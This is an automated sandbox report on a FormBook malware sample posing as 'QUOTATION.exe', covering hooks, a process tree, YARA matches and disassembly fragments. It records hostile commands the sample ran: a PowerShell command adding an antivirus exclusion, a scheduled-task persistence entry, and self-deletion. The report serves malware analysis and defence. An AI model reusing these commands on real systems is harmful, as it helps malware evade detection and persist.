                  Data Ascii: </div> </div> </div> </div> </div> <div class="cleared"></div><div class="art-footer"> <div class="art-foo


                  Code Manipulations

                  User Modules

                  Hook Summary

                  Function NameHook TypeActive in Processes
                  PeekMessageAINLINEexplorer.exe
                  PeekMessageWINLINEexplorer.exe
                  GetMessageWINLINEexplorer.exe
                  GetMessageAINLINEexplorer.exe

                  Processes

                  Process: explorer.exe, Module: user32.dll
                  Function NameHook TypeNew Data
                  PeekMessageAINLINE0x48 0x8B 0xB8 0x80 0x0E 0xE1
                  PeekMessageWINLINE0x48 0x8B 0xB8 0x88 0x8E 0xE1
                  GetMessageWINLINE0x48 0x8B 0xB8 0x88 0x8E 0xE1
                  GetMessageAINLINE0x48 0x8B 0xB8 0x80 0x0E 0xE1

                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  Analysis Process: QUOTATION.exe PID: 6924 Parent PID: 1744

                  General

                  Start time:19:54:31
                  Start date:02/12/2021
                  Path:C:\Users\user\Desktop\QUOTATION.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\QUOTATION.exe"
                  Imagebase:0x360000
                  File size:684032 bytes
                  MD5 hash:213D8FD4B74E3B1122CFC1A9159AA579
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Yara matches:
                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.299185343.000000000276E000.00000004.00000001.sdmp, Author: Joe Security
                  Reputation:low

                  Chronological Activities

                  Analysis Process: powershell.exe PID: 7120 Parent PID: 6924

                  General

                  Start time:19:54:34
                  Start date:02/12/2021
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe
                  Imagebase:0x940000
                  File size:430592 bytes
                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Reputation:high

                  Chronological Activities

                  Analysis Process: conhost.exe PID: 7164 Parent PID: 7120

                  General

                  Start time:19:54:34
                  Start date:02/12/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7f20f0000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Chronological Activities

                  Analysis Process: schtasks.exe PID: 5516 Parent PID: 6924

                  General

                  Start time:19:54:35
                  Start date:02/12/2021
                  Path:C:\Windows\SysWOW64\schtasks.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lQdAGavApIJoo" /XML "C:\Users\user\AppData\Local\Temp\tmp8E88.tmp
                  Imagebase:0xf0000
                  File size:185856 bytes
                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Chronological Activities

                  Analysis Process: conhost.exe PID: 3180 Parent PID: 5516

                  General

                  Start time:19:54:36
                  Start date:02/12/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7f20f0000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Chronological Activities

                  Analysis Process: QUOTATION.exe PID: 6728 Parent PID: 6924

                  General

                  Start time:19:54:37
                  Start date:02/12/2021
                  Path:C:\Users\user\Desktop\QUOTATION.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Users\user\Desktop\QUOTATION.exe
                  Imagebase:0x330000
                  File size:684032 bytes
                  MD5 hash:213D8FD4B74E3B1122CFC1A9159AA579
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low

                  Chronological Activities

                  Analysis Process: QUOTATION.exe PID: 5372 Parent PID: 6924

                  General

                  Start time:19:54:39
                  Start date:02/12/2021
                  Path:C:\Users\user\Desktop\QUOTATION.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\Desktop\QUOTATION.exe
                  Imagebase:0x520000
                  File size:684032 bytes
                  MD5 hash:213D8FD4B74E3B1122CFC1A9159AA579
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low

                  Chronological Activities

                  Analysis Process: explorer.exe PID: 3352 Parent PID: 5372

                  General

                  Start time:19:54:42
                  Start date:02/12/2021
                  Path:C:\Windows\explorer.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Explorer.EXE
                  Imagebase:0x7ff720ea0000
                  File size:3933184 bytes
                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:high

                  Chronological Activities

                  Analysis Process: autoconv.exe PID: 3180 Parent PID: 3352

                  General

                  Start time:19:55:05
                  Start date:02/12/2021
                  Path:C:\Windows\SysWOW64\autoconv.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\SysWOW64\autoconv.exe
                  Imagebase:0x990000
                  File size:851968 bytes
                  MD5 hash:4506BE56787EDCD771A351C10B5AE3B7
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:moderate

                  Chronological Activities

                  Analysis Process: NETSTAT.EXE PID: 5100 Parent PID: 5372

                  General

                  Start time:19:55:17
                  Start date:02/12/2021
                  Path:C:\Windows\SysWOW64\NETSTAT.EXE
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                  Imagebase:0x1050000
                  File size:32768 bytes
                  MD5 hash:4E20FF629119A809BC0E7EE2D18A7FDB
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:moderate

                  Chronological Activities

                  Analysis Process: cmd.exe PID: 6896 Parent PID: 5100

                  General

                  Start time:19:55:19
                  Start date:02/12/2021
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:/c del "C:\Users\user\Desktop\QUOTATION.exe"
                  Imagebase:0xd80000
                  File size:232960 bytes
                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Chronological Activities

                  Analysis Process: conhost.exe PID: 6936 Parent PID: 6896

                  General

                  Start time:19:55:20
                  Start date:02/12/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7f20f0000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Chronological Activities

                  Disassembly

                  Code Analysis

                  Reset < >

                    Analysis Process: QUOTATION.exe PID: 6924 Parent PID: 1744 QUOTATION.exeCOMMON

                    Executed Functions

                    Function 00DAB880, Relevance: 6.1, APIs: 4, Instructions: 126threadCOMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentProcess.KERNEL32 ref: 00DAB8F0
                    • GetCurrentThread.KERNEL32 ref: 00DAB92D
                    • GetCurrentProcess.KERNEL32 ref: 00DAB96A
                    • GetCurrentThreadId.KERNEL32 ref: 00DAB9C3
                    Memory Dump Source
                    • Source File: 00000001.00000002.298620192.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                    Similarity
                    • API ID: Current$ProcessThread
                    • String ID:
                    • API String ID: 2063062207-0
                    • Opcode ID: d60dcf106f92ed14a900657716e1eae29eac8a1402c33872637d9bcfaf2ecb2e
                    • Instruction ID: 89db87bf613ca57d18c6375eaf222f536cd68e5074164c5552ca19696c1a7747
                    • Opcode Fuzzy Hash: d60dcf106f92ed14a900657716e1eae29eac8a1402c33872637d9bcfaf2ecb2e
                    • Instruction Fuzzy Hash: 0B5176B09006488FDB10CFAAD6487DEBBF4BF49314F2489AAE119A7351C7749845CF62
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00DAB890, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentProcess.KERNEL32 ref: 00DAB8F0
                    • GetCurrentThread.KERNEL32 ref: 00DAB92D
                    • GetCurrentProcess.KERNEL32 ref: 00DAB96A
                    • GetCurrentThreadId.KERNEL32 ref: 00DAB9C3
                    Memory Dump Source
                    • Source File: 00000001.00000002.298620192.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                    Similarity
                    • API ID: Current$ProcessThread
                    • String ID:
                    • API String ID: 2063062207-0
                    • Opcode ID: 47100a05bb0b0f2e896d4d42ef337332e94262b48fe1e657cc61112fce331561
                    • Instruction ID: 9d7a5ac5f26d36ab8e3ecae6de5fb6d9e0fbb8480d8f57832a31f4a0b43deed4
                    • Opcode Fuzzy Hash: 47100a05bb0b0f2e896d4d42ef337332e94262b48fe1e657cc61112fce331561
                    • Instruction Fuzzy Hash: 6B5165B09006488FDB14CFAAD6487DEBBF4BF49314F24895AE119A7351C7749844CF62
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00DA95A8, Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00DA97EE
                    Memory Dump Source
                    • Source File: 00000001.00000002.298620192.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                    Similarity
                    • API ID: HandleModule
                    • String ID:
                    • API String ID: 4139908857-0
                    • Opcode ID: 10ca8c59dc2fc82893eaefb07ceaeae2e6692c8358145c2c64467ef5dc10021d
                    • Instruction ID: 0253eec88fad80654f6d12bf79423ce243da1ca7806e1cba37b1379d1f72f2fd
                    • Opcode Fuzzy Hash: 10ca8c59dc2fc82893eaefb07ceaeae2e6692c8358145c2c64467ef5dc10021d
                    • Instruction Fuzzy Hash: 78713470A00B058FDB24CF6AD0657AAB7F5BF89304F04892DE49AD7A40DB75E905CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00DA5365, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                    Download Yara Rule
                    APIs
                    • CreateActCtxA.KERNEL32(?), ref: 00DA5421
                    Memory Dump Source
                    • Source File: 00000001.00000002.298620192.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                    Similarity
                    • API ID: Create
                    • String ID:
                    • API String ID: 2289755597-0
                    • Opcode ID: 1eb0de50ab91f0d3dc2ef050f6744d0c4290854737c678d38bd9056ec7c376ba
                    • Instruction ID: 58c6229234db245c079fff4202c75b7e0480e5477bbbe423eec6f02731869b58
                    • Opcode Fuzzy Hash: 1eb0de50ab91f0d3dc2ef050f6744d0c4290854737c678d38bd9056ec7c376ba
                    • Instruction Fuzzy Hash: DE41F2B0C00619CBDB24CFA9D8447DEBBB5BF89304F148469D509BB254D7B5594ACFA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00DA3E8C, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                    Download Yara Rule
                    APIs
                    • CreateActCtxA.KERNEL32(?), ref: 00DA5421
                    Memory Dump Source
                    • Source File: 00000001.00000002.298620192.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                    Similarity
                    • API ID: Create
                    • String ID:
                    • API String ID: 2289755597-0
                    • Opcode ID: b5f0c1dde9e20393cfae714c763e9c08a2e0b7b593d37e0d5733f1f7d9172608
                    • Instruction ID: da492cf846ea7868934cd4d0d39ae2cecd943f7cdc878b7e0ae65556ecc82655
                    • Opcode Fuzzy Hash: b5f0c1dde9e20393cfae714c763e9c08a2e0b7b593d37e0d5733f1f7d9172608
                    • Instruction Fuzzy Hash: 6641D2B0C0061CCBDB24CFA9D8447CEBBB5BF89304F248469D509BB255DBB5A945CFA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00DABEB8, Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                    Download Yara Rule
                    APIs
                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00DABF47
                    Memory Dump Source
                    • Source File: 00000001.00000002.298620192.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                    Similarity
                    • API ID: DuplicateHandle
                    • String ID:
                    • API String ID: 3793708945-0
                    • Opcode ID: 3f25fc09adfdf2473cc537bbd088d3402875b5e282eb1f16e6edc5a77bcc76f7
                    • Instruction ID: 449c26cfdb503e9ad60985e7d2ba237a6a7a0a7a5a3bf845b5815d9b1dccbbae
                    • Opcode Fuzzy Hash: 3f25fc09adfdf2473cc537bbd088d3402875b5e282eb1f16e6edc5a77bcc76f7
                    • Instruction Fuzzy Hash: B921E3B59012099FDB10CFAAD984AEEBBF8FF49324F14841AE914B3311D374A955CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00DABEC0, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                    Download Yara Rule
                    APIs
                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00DABF47
                    Memory Dump Source
                    • Source File: 00000001.00000002.298620192.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                    Similarity
                    • API ID: DuplicateHandle
                    • String ID:
                    • API String ID: 3793708945-0
                    • Opcode ID: 7adc1704f33ad301560675eff0b2a05e157ecbbefd7bde5a61c10d0fe1bab6f8
                    • Instruction ID: b03ed07fefe251853f7a61677e6271822350c8d7a31eb5a1bea54b04c38f8d5b
                    • Opcode Fuzzy Hash: 7adc1704f33ad301560675eff0b2a05e157ecbbefd7bde5a61c10d0fe1bab6f8
                    • Instruction Fuzzy Hash: 3621C2B59012099FDB10CFAAD984ADEBBF8FF48324F14841AE918A7310D374A954CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00DA9A08, Relevance: 1.6, APIs: 1, Instructions: 59libraryCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00DA9869,00000800,00000000,00000000), ref: 00DA9A7A
                    Memory Dump Source
                    • Source File: 00000001.00000002.298620192.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: 52948d9eddb8d36d8ff63436e61393bfeb10c391a12a979304f7d06ea00e6dbc
                    • Instruction ID: 6a1c82e5e547f9a71bc20e1d2533f7c0120d7a8c21c59b25f8af9c8fdab1bb87
                    • Opcode Fuzzy Hash: 52948d9eddb8d36d8ff63436e61393bfeb10c391a12a979304f7d06ea00e6dbc
                    • Instruction Fuzzy Hash: 7A2167B6D002098FDB10CFAAD844ADEFBF5AB89324F14842ED519B7300C374A905CFA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00DA8958, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00DA9869,00000800,00000000,00000000), ref: 00DA9A7A
                    Memory Dump Source
                    • Source File: 00000001.00000002.298620192.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: c13743f5a9b36943f698dadaa37729ca3f25e596dcd2e19de14461ba034204ae
                    • Instruction ID: f5d372b83a280661625165b6d6eec5cb0f440b0a7f550019a6fb6e858a6879ba
                    • Opcode Fuzzy Hash: c13743f5a9b36943f698dadaa37729ca3f25e596dcd2e19de14461ba034204ae
                    • Instruction Fuzzy Hash: 6C11E4B69003099FDB10CF9AD444BDEFBF8EB89324F14842AE519B7600C375A945CFA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00DA9788, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00DA97EE
                    Memory Dump Source
                    • Source File: 00000001.00000002.298620192.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                    Similarity
                    • API ID: HandleModule
                    • String ID:
                    • API String ID: 4139908857-0
                    • Opcode ID: 8bc259c34dca55c9bc6ca57a3346cc3a69a2392b5fbf28d223276dfd8cd6a863
                    • Instruction ID: 8b3710bc7a1b183241f831f3bedfd0fc5f1c2dcc2249921aabf81cdb15f645bd
                    • Opcode Fuzzy Hash: 8bc259c34dca55c9bc6ca57a3346cc3a69a2392b5fbf28d223276dfd8cd6a863
                    • Instruction Fuzzy Hash: 2011E3B5C006498FDB10CF9AD444BDEFBF4AF89324F14842AD519B7600D374A545CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BCD01C, Relevance: .1, Instructions: 72COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.298536914.0000000000BCD000.00000040.00000001.sdmp, Offset: 00BCD000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 87731c252d2829a5e97d71ff75086e286231ce1de63de8884cad6527f1d47299
                    • Instruction ID: 6ad47b27cc88d3c3e630fc2a70461d9b0383c3c8dcc347afa68ecb1e55374064
                    • Opcode Fuzzy Hash: 87731c252d2829a5e97d71ff75086e286231ce1de63de8884cad6527f1d47299
                    • Instruction Fuzzy Hash: 8521D079604244DFCB14CF28D9D4F16BBA5FB84324F24C9FDD84A4B286C736D846CA61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BCD006, Relevance: .1, Instructions: 60COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.298536914.0000000000BCD000.00000040.00000001.sdmp, Offset: 00BCD000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 42d64357f0f686ce32959293dc5a283a125116ca254391b5083474e153051df9
                    • Instruction ID: 315f4cfb17f4ee818e92f71f1047b54eaf7a0abaa3efc6ccb0b9904decdd0e92
                    • Opcode Fuzzy Hash: 42d64357f0f686ce32959293dc5a283a125116ca254391b5083474e153051df9
                    • Instruction Fuzzy Hash: 6E2199755093809FCB12CF24D594B15BF71EB45314F28C5EED8498B657C33AD84ACB62
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 00DAE778, Relevance: .3, Instructions: 315COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.298620192.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 29c262064cad6825872a1257ac44178a81554bf983baa93aaba1a3b254a32542
                    • Instruction ID: 6704048ea0bacef2a04a68304430806782c9b5d456c4d9e7ed7b6c7a2797cbf2
                    • Opcode Fuzzy Hash: 29c262064cad6825872a1257ac44178a81554bf983baa93aaba1a3b254a32542
                    • Instruction Fuzzy Hash: 2F12D5F1C917468BE312DF65E8981CD7BA1B746328FD06A09D2633AAD0D7B411EACF44
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00DABDC4, Relevance: .3, Instructions: 265COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.298620192.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ddabeb8829885d875c608f2ae301cb282992f522c3c9570e8987c0b42f9c8322
                    • Instruction ID: da71df2d3607dd150ca72eb1c7b5b32a8b6bcea6a72c6a5c269b03faa7bbe5a8
                    • Opcode Fuzzy Hash: ddabeb8829885d875c608f2ae301cb282992f522c3c9570e8987c0b42f9c8322
                    • Instruction Fuzzy Hash: 1DA14C32E006198FCF05DFB5C8445DEBBB3FF85300B15856AE906AB261EB71E955CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00DAE76B, Relevance: .2, Instructions: 222COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.298620192.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 77d93d4cfc93dc83c3f796da8b08dcdb9274bdfe73c16b909975ba6c21e0928d
                    • Instruction ID: 671ce468f07875f831138b7beba15bdf2475423db0f1e5f52810b28047bcf147
                    • Opcode Fuzzy Hash: 77d93d4cfc93dc83c3f796da8b08dcdb9274bdfe73c16b909975ba6c21e0928d
                    • Instruction Fuzzy Hash: 50C16CB0C917468BD312EF65E8981CD7B71BB86328F916A09D2223B6D0D7B414EACF44
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Analysis Process: QUOTATION.exe PID: 5372 Parent PID: 6924 QUOTATION.exeCOMMON

                    Executed Functions

                    Function 0041A40A, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 68filenativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: FileRead
                    • String ID: 1JA$rMA$rMA
                    • API String ID: 2738559852-782607585
                    • Opcode ID: 8eeb3b91b95342c17108ad0ffa92a1bfd8d5998487622c32ba417a737261854e
                    • Instruction ID: 6f3c4289bd5354d0cac49cdb546d690e9120c8d6dacb0d28e3d6b7d687130ae2
                    • Opcode Fuzzy Hash: 8eeb3b91b95342c17108ad0ffa92a1bfd8d5998487622c32ba417a737261854e
                    • Instruction Fuzzy Hash: A911E2B6204148AFCB04DF99DC80DEB77A9EF8C758F15824DFA1D97245C634E8128BA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A410, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                    Download Yara Rule
                    C-Code - Quality: 37%
                    			E0041A410(void* __edx, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* __esi;
				void* _t18;
				void* _t28;
				intOrPtr* _t29;

				_t13 = _a4;
				_t29 = _a4 + 0xc48;
				E0041AF60(__edx, _t28, _t29, _t13, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x414a31
				_t6 =  &_a32; // 0x414d72
				_t12 =  &_a8; // 0x414d72
				_t18 =  *((intOrPtr*)( *_t29))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}







                    0x0041a413
                    0x0041a41f
                    0x0041a427
                    0x0041a42c
                    0x0041a432
                    0x0041a44d
                    0x0041a455
                    0x0041a459

                    APIs
                    • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: FileRead
                    • String ID: 1JA$rMA$rMA
                    • API String ID: 2738559852-782607585
